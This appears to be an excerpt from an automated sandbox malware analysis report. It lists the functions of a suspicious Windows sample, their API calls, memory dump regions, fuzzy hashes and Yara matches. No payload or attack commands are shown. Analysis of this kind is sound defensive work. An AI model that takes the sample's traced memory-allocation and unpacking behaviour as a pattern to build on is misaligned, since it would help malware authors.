                                                                                                                                                                                                                                  • Snapshot File: hcaresult_19_2_400000_B46afLBMY0mokUgVdA9CQR52.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: __fread_nolock
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 2638373210-0
                                                                                                                                                                                                                                  • Opcode ID: 25aeabf7499e8ad583be7248ba51f421055d1c52451b24307ef19921f3e1bf67
                                                                                                                                                                                                                                  • Instruction ID: 0bde1253143090ae73d8540e9fd285f072e0ff93183f3a7406587cf81db67a05
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 25aeabf7499e8ad583be7248ba51f421055d1c52451b24307ef19921f3e1bf67
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: CF316B31604706AFC710DE29C884A5ABBA0BF88354F04863EF954A73A1D779D854CB9A
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  Function 004024A1 Relevance: 1.6, APIs: 1, Instructions: 85COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • __EH_prolog.LIBCMT ref: 004024A6
                                                                                                                                                                                                                                    • Part of subcall function 0040187F: __CxxThrowException@8.LIBVCRUNTIME ref: 004018C9
                                                                                                                                                                                                                                    • Part of subcall function 0040187F: std::system_error::system_error.LIBCPMT ref: 004018D8
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000013.00000002.1738735258.0000000000400000.00000040.00000001.01000000.0000000E.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000013.00000002.1738735258.000000000043E000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_19_2_400000_B46afLBMY0mokUgVdA9CQR52.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: Exception@8H_prologThrowstd::system_error::system_error
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 938716162-0
                                                                                                                                                                                                                                  • Opcode ID: 1152c10f0f73a98428df0f9104ae7712f9923eb88e3ed4c89856aabc2728c85f
                                                                                                                                                                                                                                  • Instruction ID: 51a424f7f6e89c6a531f911fc24cb136489b0386115aa572e9e255c0d5409117
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 1152c10f0f73a98428df0f9104ae7712f9923eb88e3ed4c89856aabc2728c85f
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: B9318B71A00505AFCB18DF69C9D5E6AB7F5FF84318718C16EE416AB791C634EC40CB54
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  Function 0040257C Relevance: 1.6, APIs: 1, Instructions: 79COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • __EH_prolog.LIBCMT ref: 00402581
                                                                                                                                                                                                                                    • Part of subcall function 00402B06: __EH_prolog.LIBCMT ref: 00402B0B
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000013.00000002.1738735258.0000000000400000.00000040.00000001.01000000.0000000E.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000013.00000002.1738735258.000000000043E000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_19_2_400000_B46afLBMY0mokUgVdA9CQR52.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: H_prolog
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 3519838083-0
                                                                                                                                                                                                                                  • Opcode ID: 2c318ff338f7a8eac22c397537d2360df678c12f2412966b479c09de5dfc03e1
                                                                                                                                                                                                                                  • Instruction ID: 5794e906f2440793f0f111a630642e31dc7bb6ced8b38f44c89e924cf631a0c7
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 2c318ff338f7a8eac22c397537d2360df678c12f2412966b479c09de5dfc03e1
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 87318770A00615AFCB15DF09CA84A9ABBB1FF48314F14856EE405AB791C7B9ED40CB94
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  Function 00402403 Relevance: 1.6, APIs: 1, Instructions: 58COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • __EH_prolog.LIBCMT ref: 00402408
                                                                                                                                                                                                                                    • Part of subcall function 00402B06: __EH_prolog.LIBCMT ref: 00402B0B
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000013.00000002.1738735258.0000000000400000.00000040.00000001.01000000.0000000E.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000013.00000002.1738735258.000000000043E000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_19_2_400000_B46afLBMY0mokUgVdA9CQR52.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: H_prolog
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 3519838083-0
                                                                                                                                                                                                                                  • Opcode ID: 8ed48e9fba55e0418c031890955b2c9948e55e9159a839dee9493f5c858f8f4c
                                                                                                                                                                                                                                  • Instruction ID: 4e0495d31301cfc09fe992fc8428b3d42591f74c8e771436201b91ad316d0700
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 8ed48e9fba55e0418c031890955b2c9948e55e9159a839dee9493f5c858f8f4c
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 9D217C70601611DFC728DF19C54896ABBF5FF88314B20C26DE85A9B7A1C774AE41CB90
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  Function 0041AFF9 Relevance: 1.6, APIs: 1, Instructions: 54COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000013.00000002.1738735258.0000000000400000.00000040.00000001.01000000.0000000E.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000013.00000002.1738735258.000000000043E000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_19_2_400000_B46afLBMY0mokUgVdA9CQR52.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: __wsopen_s
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 3347428461-0
                                                                                                                                                                                                                                  • Opcode ID: 9d91d9df30251d2d82c78a357851f1850054374a36094e401c27366056efc238
                                                                                                                                                                                                                                  • Instruction ID: 62b4485d732ad4ebc0017ff3881fb56af0f069673ee8f9cf524c42d6b5156d4d
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 9d91d9df30251d2d82c78a357851f1850054374a36094e401c27366056efc238
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 6911367590410AAFCB05DF98E9419EB7BF4EF48314F0040AAF819AB311D631E9618BA9
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  Function 0040E1B2 Relevance: 1.5, APIs: 1, Instructions: 46COMMONLIBRARYCODE
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000013.00000002.1738735258.0000000000400000.00000040.00000001.01000000.0000000E.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000013.00000002.1738735258.000000000043E000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_19_2_400000_B46afLBMY0mokUgVdA9CQR52.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                  • Opcode ID: 6507e6dca9fd37c1152104383e81a26a388e7b6248357c92fed83c7c77d0c48c
                                                                                                                                                                                                                                  • Instruction ID: bb13e13d757cd37dfe0a4f239b5d8845d05e4a8eb61872b1cde1787caac163ea
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 6507e6dca9fd37c1152104383e81a26a388e7b6248357c92fed83c7c77d0c48c
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: E4F0F93254061496D6213A6B9C0579B32AC9F92339F114BBFFC30A61C2CA7CE95246AE
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  Function 00402F6B Relevance: 1.5, APIs: 1, Instructions: 43COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • __EH_prolog.LIBCMT ref: 00402F70
                                                                                                                                                                                                                                    • Part of subcall function 004035F5: __EH_prolog.LIBCMT ref: 004035FA
                                                                                                                                                                                                                                    • Part of subcall function 004035F5: std::_Lockit::_Lockit.LIBCPMT ref: 00403609
                                                                                                                                                                                                                                    • Part of subcall function 004035F5: int.LIBCPMT ref: 00403620
                                                                                                                                                                                                                                    • Part of subcall function 004035F5: std::locale::_Getfacet.LIBCPMT ref: 00403629
                                                                                                                                                                                                                                    • Part of subcall function 004035F5: std::_Lockit::~_Lockit.LIBCPMT ref: 00403670
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000013.00000002.1738735258.0000000000400000.00000040.00000001.01000000.0000000E.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000013.00000002.1738735258.000000000043E000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_19_2_400000_B46afLBMY0mokUgVdA9CQR52.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: H_prologLockitstd::_$GetfacetLockit::_Lockit::~_std::locale::_
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 3585332825-0
                                                                                                                                                                                                                                  • Opcode ID: 275b497e8b0ccd48a1c91312fae6d11bbe173a5bd3edbee57c471b6d182478c8
                                                                                                                                                                                                                                  • Instruction ID: 4123f54f6db546b52d5441bf0cc69889d4086bdab9222fcc4d2dc13d92cadc12
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 275b497e8b0ccd48a1c91312fae6d11bbe173a5bd3edbee57c471b6d182478c8
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 32018F70610114AFDB14DB65CA0ABAEB3F9AF44708F00403EF405B76D1DBF8AE408B58
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  Function 0041A2FA Relevance: 1.5, APIs: 1, Instructions: 36COMMONLIBRARYCODE
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000013.00000002.1738735258.0000000000400000.00000040.00000001.01000000.0000000E.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000013.00000002.1738735258.000000000043E000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_19_2_400000_B46afLBMY0mokUgVdA9CQR52.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: _free
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 269201875-0
                                                                                                                                                                                                                                  • Opcode ID: e7ba057ced36894faabbf0cfef253f3c85e20b59e21e5f6d36d312241c511836
                                                                                                                                                                                                                                  • Instruction ID: b492b302e4735b3d70b5ef79ffcf6f17a9fdb10017537b69176e17197afc0c8a
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: e7ba057ced36894faabbf0cfef253f3c85e20b59e21e5f6d36d312241c511836
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 6DF09A3251111CBBCF015E96DC01DDA3B6EEF89324F100256FD2492050DA3ACA61ABA5
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  Function 00417A45 Relevance: 1.5, APIs: 1, Instructions: 32memoryCOMMONLIBRARYCODE
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • RtlAllocateHeap.NTDLL(00000000,?,00000000,?,0041B4CD,00000000,?,00410DE7,?,00000008,?,00411992,?,?,?), ref: 00417A77
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000013.00000002.1738735258.0000000000400000.00000040.00000001.01000000.0000000E.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000013.00000002.1738735258.000000000043E000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_19_2_400000_B46afLBMY0mokUgVdA9CQR52.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: AllocateHeap
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 1279760036-0
                                                                                                                                                                                                                                  • Opcode ID: 092e8eca157d4569dfa0d65f99c280fa9eac993ee60f56a2dbe510387d4a55ad
                                                                                                                                                                                                                                  • Instruction ID: dd4a480e522f73ad3d9a6edd52b828d095e0909c103fd04d4038ae70eb088b48
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 092e8eca157d4569dfa0d65f99c280fa9eac993ee60f56a2dbe510387d4a55ad
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 35E0A03128822557972026629C00BDF6A69AF417E0B150223BC0496290CA5C8BD182AD
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  Function 00409256 Relevance: 1.5, APIs: 1, Instructions: 28COMMONLIBRARYCODE
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • __CxxThrowException@8.LIBVCRUNTIME ref: 00409967
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000013.00000002.1738735258.0000000000400000.00000040.00000001.01000000.0000000E.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000013.00000002.1738735258.000000000043E000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_19_2_400000_B46afLBMY0mokUgVdA9CQR52.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: Exception@8Throw
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 2005118841-0
                                                                                                                                                                                                                                  • Opcode ID: 489952d28efb397f2e18812c634cc1d627a37715331dca0dd55d847e965f5b37
                                                                                                                                                                                                                                  • Instruction ID: da63f0164d942bc1a0aafd7abbbc04ca9aad8e839738e50b0fb3006ae61beab9
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 489952d28efb397f2e18812c634cc1d627a37715331dca0dd55d847e965f5b37
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: E9E0923440430EB6CF047A66D9169AA372C1E00324F20897FB818B55E2EB78DDA6C59E
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  Function 0041A039 Relevance: 1.5, APIs: 1, Instructions: 15fileCOMMONLIBRARYCODE
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • CreateFileW.KERNEL32(?,?,?,?,?,?,00000000,?,00000000,00000000,00000000,00000000,00000000), ref: 0041A056
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000013.00000002.1738735258.0000000000400000.00000040.00000001.01000000.0000000E.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000013.00000002.1738735258.000000000043E000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_19_2_400000_B46afLBMY0mokUgVdA9CQR52.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: CreateFile
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 823142352-0
                                                                                                                                                                                                                                  • Opcode ID: 8f292a683753c08d8b1a23b46936a59e33a617ccbc84d6f71105d7b09af89fad
                                                                                                                                                                                                                                  • Instruction ID: d84f72958a1ce38eec5c6f13dd7d1e1a4f86a781eb43601fc0a5ec169b289762
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 8f292a683753c08d8b1a23b46936a59e33a617ccbc84d6f71105d7b09af89fad
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: B2D06C3210010DBBDF129F84DC06EDA7BAAFB48754F018010BA5856060C732E872AB94
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  Function 0418C995 Relevance: 1.3, APIs: 1, Instructions: 48memoryCOMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • VirtualAlloc.KERNEL32(00000000,?,00001000,00000040), ref: 0418C9E6
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000013.00000002.1917490394.000000000418C000.00000040.00000020.00020000.00000000.sdmp, Offset: 0418C000, based on PE: false
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_19_2_418c000_B46afLBMY0mokUgVdA9CQR52.jbxd
                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: AllocVirtual
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 4275171209-0
                                                                                                                                                                                                                                  • Opcode ID: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
                                                                                                                                                                                                                                  • Instruction ID: 0d382c4450acd8a3aa4ed15817e8918ded74399c3e90674305abfa72b9f5e43a
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 6C113C79A00208EFDB01DF98C985E98BBF5AF08350F058094F9489B361E371EA50DF90
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  Non-executed Functions

                                                                                                                                                                                                                                  Function 0042099B Relevance: 15.9, APIs: 5, Strings: 4, Instructions: 188COMMONLIBRARYCODE
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                    • Part of subcall function 00416D19: GetLastError.KERNEL32(?,?,0040E430,?,?,?,0040EB2D,?), ref: 00416D1D
                                                                                                                                                                                                                                    • Part of subcall function 00416D19: _free.LIBCMT ref: 00416D50
                                                                                                                                                                                                                                    • Part of subcall function 00416D19: SetLastError.KERNEL32(00000000), ref: 00416D91
                                                                                                                                                                                                                                    • Part of subcall function 00416D19: _abort.LIBCMT ref: 00416D97
                                                                                                                                                                                                                                    • Part of subcall function 00416D19: _free.LIBCMT ref: 00416D78
                                                                                                                                                                                                                                    • Part of subcall function 00416D19: SetLastError.KERNEL32(00000000), ref: 00416D85
                                                                                                                                                                                                                                  • GetUserDefaultLCID.KERNEL32(?,?,?), ref: 00420AA7
                                                                                                                                                                                                                                  • IsValidCodePage.KERNEL32(00000000), ref: 00420B02
                                                                                                                                                                                                                                  • IsValidLocale.KERNEL32(?,00000001), ref: 00420B11
                                                                                                                                                                                                                                  • GetLocaleInfoW.KERNEL32(?,00001001,=CA,00000040,?,?,00000055,00000000,?,?,00000055,00000000), ref: 00420B59
                                                                                                                                                                                                                                  • GetLocaleInfoW.KERNEL32(?,00001002,00000004,00000040), ref: 00420B78
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000013.00000002.1738735258.0000000000400000.00000040.00000001.01000000.0000000E.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000013.00000002.1738735258.000000000043E000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_19_2_400000_B46afLBMY0mokUgVdA9CQR52.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: ErrorLastLocale$InfoValid_free$CodeDefaultPageUser_abort
                                                                                                                                                                                                                                  • String ID: 0B$=CA$=CA$=CA
                                                                                                                                                                                                                                  • API String ID: 745075371-1249640317
                                                                                                                                                                                                                                  • Opcode ID: 4cb23aab0735c5b4cc35bd03c159b6d2568e8db36e90407488946ecd2a914ac6
                                                                                                                                                                                                                                  • Instruction ID: 4fe3cdac360959e8bc756ce2b097bcf421192d2936f9b63a8d14e5918577f4e5
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 4cb23aab0735c5b4cc35bd03c159b6d2568e8db36e90407488946ecd2a914ac6
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 1E519471B003259BDB20DFA5EC45BBF73F8AF24700FC4446AA904E7292D77899408B59
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  Function 00420063 Relevance: 10.7, APIs: 4, Strings: 2, Instructions: 236COMMONLIBRARYCODE
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                    • Part of subcall function 00416D19: GetLastError.KERNEL32(?,?,0040E430,?,?,?,0040EB2D,?), ref: 00416D1D
                                                                                                                                                                                                                                    • Part of subcall function 00416D19: _free.LIBCMT ref: 00416D50
                                                                                                                                                                                                                                    • Part of subcall function 00416D19: SetLastError.KERNEL32(00000000), ref: 00416D91
                                                                                                                                                                                                                                    • Part of subcall function 00416D19: _abort.LIBCMT ref: 00416D97
                                                                                                                                                                                                                                  • IsValidCodePage.KERNEL32(00000000,?,?,?,?,?,?,00414344,?,?,?,?,00413D9B,?,00000004), ref: 00420145
                                                                                                                                                                                                                                  • _wcschr.LIBVCRUNTIME ref: 004201D5
                                                                                                                                                                                                                                  • _wcschr.LIBVCRUNTIME ref: 004201E3
                                                                                                                                                                                                                                  • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078,DCA,00000000,?), ref: 00420286
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000013.00000002.1738735258.0000000000400000.00000040.00000001.01000000.0000000E.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000013.00000002.1738735258.000000000043E000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_19_2_400000_B46afLBMY0mokUgVdA9CQR52.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: ErrorLast_wcschr$CodeInfoLocalePageValid_abort_free
                                                                                                                                                                                                                                  • String ID: 0B$DCA
                                                                                                                                                                                                                                  • API String ID: 4212172061-1121888207
                                                                                                                                                                                                                                  • Opcode ID: 46676c4ac3c69468ff1db77bf10ad3de6e3b023533a561db1a5166dfe2bba4dc
                                                                                                                                                                                                                                  • Instruction ID: e41c47d1cae27ef38c8e1a894900132afe6bf825e943f98d621edfc326b9cdfb
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 46676c4ac3c69468ff1db77bf10ad3de6e3b023533a561db1a5166dfe2bba4dc
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 34610775700225AAD724AB65EC46BBB77E8EF04314F54006FF905DB283EB78ED418768
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  Function 004207C7 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 86COMMONLIBRARYCODE
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • GetLocaleInfoW.KERNEL32(?,2000000B,00000000,00000002,00000000,?,?,?,00420AE6,?,00000000), ref: 00420860
                                                                                                                                                                                                                                  • GetLocaleInfoW.KERNEL32(?,20001004,00000000,00000002,00000000,?,?,?,00420AE6,?,00000000), ref: 00420889
                                                                                                                                                                                                                                  • GetACP.KERNEL32(?,?,00420AE6,?,00000000), ref: 0042089E
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000013.00000002.1738735258.0000000000400000.00000040.00000001.01000000.0000000E.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000013.00000002.1738735258.000000000043E000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_19_2_400000_B46afLBMY0mokUgVdA9CQR52.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: InfoLocale
                                                                                                                                                                                                                                  • String ID: ACP$OCP$B
                                                                                                                                                                                                                                  • API String ID: 2299586839-1332025818
                                                                                                                                                                                                                                  • Opcode ID: 06e0d05587b56d9904c443129aec0706fd7a1e514c1b8a60ecd4226da2314d5f
                                                                                                                                                                                                                                  • Instruction ID: b7a8718eca8bd207e438c17e895b22dc0f84da9ff629001d2d850ed802a8b5f8
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 06e0d05587b56d9904c443129aec0706fd7a1e514c1b8a60ecd4226da2314d5f
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 5321F422B00124AADB34AF14E900BA773E6EF90B10BD68476E809D7312E736DD41C3D9
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  Function 05D00C02 Relevance: 7.7, APIs: 5, Instructions: 188COMMONLIBRARYCODE
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                    • Part of subcall function 05CF6F80: GetLastError.KERNEL32(?,?,05CEE697,?,?,?,05CEED94,?), ref: 05CF6F84
                                                                                                                                                                                                                                    • Part of subcall function 05CF6F80: _free.LIBCMT ref: 05CF6FB7
                                                                                                                                                                                                                                    • Part of subcall function 05CF6F80: SetLastError.KERNEL32(00000000), ref: 05CF6FF8
                                                                                                                                                                                                                                    • Part of subcall function 05CF6F80: _abort.LIBCMT ref: 05CF6FFE
                                                                                                                                                                                                                                    • Part of subcall function 05CF6F80: _free.LIBCMT ref: 05CF6FDF
                                                                                                                                                                                                                                    • Part of subcall function 05CF6F80: SetLastError.KERNEL32(00000000), ref: 05CF6FEC
                                                                                                                                                                                                                                  • GetUserDefaultLCID.KERNEL32(?,?,?), ref: 05D00D0E
                                                                                                                                                                                                                                  • IsValidCodePage.KERNEL32(00000000), ref: 05D00D69
                                                                                                                                                                                                                                  • IsValidLocale.KERNEL32(?,00000001), ref: 05D00D78
                                                                                                                                                                                                                                  • GetLocaleInfoW.KERNEL32(?,00001001,05CF45A4,00000040,?,05CF46C4,00000055,00000000,?,?,00000055,00000000), ref: 05D00DC0
                                                                                                                                                                                                                                  • GetLocaleInfoW.KERNEL32(?,00001002,05CF4624,00000040), ref: 05D00DDF
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000013.00000002.1926817341.0000000005CE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 05CE0000, based on PE: false
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_19_2_5ce0000_B46afLBMY0mokUgVdA9CQR52.jbxd
                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                  Similarity
